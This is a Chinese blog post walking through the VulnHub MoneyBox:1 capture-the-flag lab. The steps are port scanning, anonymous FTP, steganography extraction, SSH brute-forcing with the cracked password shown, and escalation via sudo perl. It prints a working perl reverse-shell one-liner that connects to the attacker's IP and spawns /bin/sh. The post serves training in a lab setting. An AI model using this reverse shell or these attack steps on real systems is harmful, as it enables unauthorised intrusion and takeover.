kali对CTF靶场进行渗透测试找flag

于 2024-05-09 23:02:25 发布
阅读量1.3k 收藏 21
点赞数 12
分类专栏: 渗透测试 文章标签: 网络安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64498620/article/details/138634990
版权

一、导入kali和靶场

靶场下载:
MoneyBox: 1 ~ VulnHub

攻击机下载:(virtualbox版本)

https://cdimage.kali.org/kali-2023.2/kali-linux-2023.2-virtualbox-amd64.7z

打开virtualBox单击左上角的管理选择导入

选择你kali和靶场存放的路径

选好后下一步

选择存放路径没有问题就可以完成导入了

对着新导入的虚拟机单击设置,在设置中选择网络把两台虚拟机的网络都选择为仅主机模式

Kali可以在网卡2再添加一个网络地址转换(NAT)以便下载更新软件时能够上网

检查无误后即可启动虚拟机进行测试

二、启动kali和靶场

三、信息收集

扫描靶场的IP地址

端口探测

发现靶场开放21 22 80端口

服务发现

Vsftpd 3.0.3

Openssh 7.9p1

Httpd 2.4.38

版本是否有漏洞?

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

四、漏洞探测

ftp允许匿名登录,使用空账号或空密码或anonymous登录

五、验证漏洞(ftp配置漏洞)

利用ftp配置不当问题,已经能ftp登录到服务器上

通过观察图片,图片上没有新提示,从直观上感觉图片正常,没有问题。

隐写术:图片上隐藏文本、代码、其他文件等。

apt install steghide

发现需要密码但目前尚未可知

六、换一个切入点渗透测试:

http://192.168.56.103

CTRL+U

http://192.168.56.103打开是index.html页面,查看源码,正常 ,没有写的不严谨的地方

web app 部署站点,通常有前台,应该还有后台,通过后台登录管理,爆破网站所有路径出来,再登录,尝试通过后台页面登录。

http://192.168.56.103/blogs/

查看源码

七、找到key

尝试看看是不是分离图片时候的登录密码

成功

图片分离出data.txt

用户 renu  用户密码很弱 需要修改密码  

我无法登录靶场,又出现无法继续渗透场景………

根据之前探测出系统开放22端口,ssh服务,用户renu,密码弱

八、爆破ssh密码

成功得到密码:987654321

发现系统存在lily用户

做免密,ssh-keygen -t rsa

Lily与renu 公钥一致

使用/usr/bin/perl脚本不需要密码nopasswd

九、漏洞利用

perl -e 'use Socket;$i="192.168.56.104";$p=4455;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

cd到root和renu目录

找出3个flags

实验到此结束

学习渗透技术要了解一下《中华人民共和国网络安全法》

祝你好运q
关注
  • 12
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
CTF渗透训练(笔记)
weixin_57536426的博客
12-26 1027
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
必考C模块Linux获取flag(5)
weixin_43708659的博客
06-11 228
必考C模块Linux获取flag
web渗透
JJH2724719395的博客
06-20 493
那第一个就是一个很明显的一个算数,但是你会发现只能输入一个,所以我们将源代码中的内容将其修改。说是vim编辑器,于是联想到一个备份文件的内容。Flag自然也就拿到了。flag就显示出来了。
web安全渗透测试
JJH2724719395的博客
04-15 251
/ 使用 ctrl+u 查看源码。// 数据库不支持符号 需要转义。
渗透测试--CTF--FLAG
qq_50034496的博客
12-06 5308
渗透测试--CTF--FLAG
CTF(Capture The Flag )环境搭建
怡红群芳的博客
03-24 3063
CTFd是目前最流行的开源CTF框架之一,是一个有Python开发的框架,侧重于易用性和可定制性。它提供了运行CTF题目所需要的一切条件,并可使用插件和主题轻松进行自定义。
sqlmap在kali中的应用及ctfhub实战
2301_77004573的博客
07-08 1276
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
网络渗透测试实验四
wow_iamfree的博客
12-07 444
文章目录一、实验目的二、实验准备与内容三、实验过程1.netdiscover发现WebDeveloper的ip2.nmap扫描目标开发端口3.访问目标网站4.whatweb探测CMS模板5.WPScan工具简介6.Dirb网站目录爆破7.通过爆出的路径到cap文件8.利用WordPress插件漏洞到目标配置文件9.远程连接目标10.使用tcpdump执行任意命令 一、实验目的 通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能
kail做CTF杂项题的工具安利一波!
qidiandexiaowu
04-08 4538
前言:上周的比赛,知识和工具都补充了一波,着实吓到我这老菜鸟了。 1.blind-watermark 这个工具主要是解决盲水印问题。 克隆到kail里 python encode.py --image <image file> --watermark <watermark file> --result <result file> python decode.p...
Kali Linux渗透测试技术详解
最新发布
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Linux渗透测试训练--DC3
qq_34094920的博客
12-01 971
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag
靶机渗透测试4
qq_52191935的博客
09-01 1297
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag,并得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
基本的WEB渗透测试
weixin_43367971的博客
10-05 2648
基本的WEB渗透测试 文章目录实验要求一、SQL注入二、File_include(文件包含):三、File_upload(文件上传): 实验要求 1. 对靶机进行注入攻击获取数据库数据信息(flag{xxx}) 2. 通过文件包含获取敏感数据(某路径下F1a9文件) 3.寻找文件上传点并尝试绕过实现木马上传实现远程控制靶机(获取某文件内容flag{xxxx}) 一、SQL注入 1.1 查询当前连接的数据库,输入命令-1’ UNION SELECT 1, database()#。 1.2 查询
MS17_010漏洞利用,渗透win7,拿到桌面的flag
weixin_54105551的博客
06-30 820
本文写的是关于我学习MS1_010漏洞下一些学习笔记,和利用漏洞进行渗透的过程
ftp删除目录命令_FTP(文件传输协议)服务器
weixin_39585035的博客
11-29 2029
前言:文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。文件传送(file transfer)和文件访问(file access)之间的区别在于:前者由FTP提供,后者由如NFS等应用系统提供。FTP是一个8位的客户端-服务器协议,能操作任何类型的文件而不需要进一步处理,就像M...
kali对靶机进行系统服务及版本扫描渗透测试
09-17
Kali是一种广泛使用的渗透测试操作系统,用于评估计算机系统的安全性。在渗透测试中,Kali可以用来对靶机进行系统服务及版本扫描,以评估系统的安全性。 系统服务及版本扫描是渗透测试中的一项重要任务,其目的是发现在目标系统上运行的网络服务及其相应的版本号。这些信息对于攻击者来说非常有价值,因为他们可以使用已知的漏洞利用这些系统服务。 Kali中有多种工具可用于执行系统服务及版本扫描。其中一个常用的工具是Nmap,它是一个强大的网络扫描器,能够帮助我们探测目标主机上运行的网络服务及其版本。通过使用Nmap,我们可以获取系统服务的详细信息,如开放端口、运行的服务和其版本号等。 Kali还提供了其他一些工具,如OpenVAS和Nessus,它们可以通过发现已知的漏洞来评估系统的安全性。这些工具可以执行自动化的系统服务和版本扫描,并生成相应的报告,以便我们分析潜在的安全问题。 通过系统服务及版本扫描,我们能够了解目标系统上运行的服务及其版本,从而帮助我们确定可能存在的漏洞,并采取相应的安全措施加以修补。这样可以帮助系统管理员提高系统的安全性,保护计算机免受潜在的攻击。在渗透测试中,这项任务对于评估目标系统的安全性和弱点非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值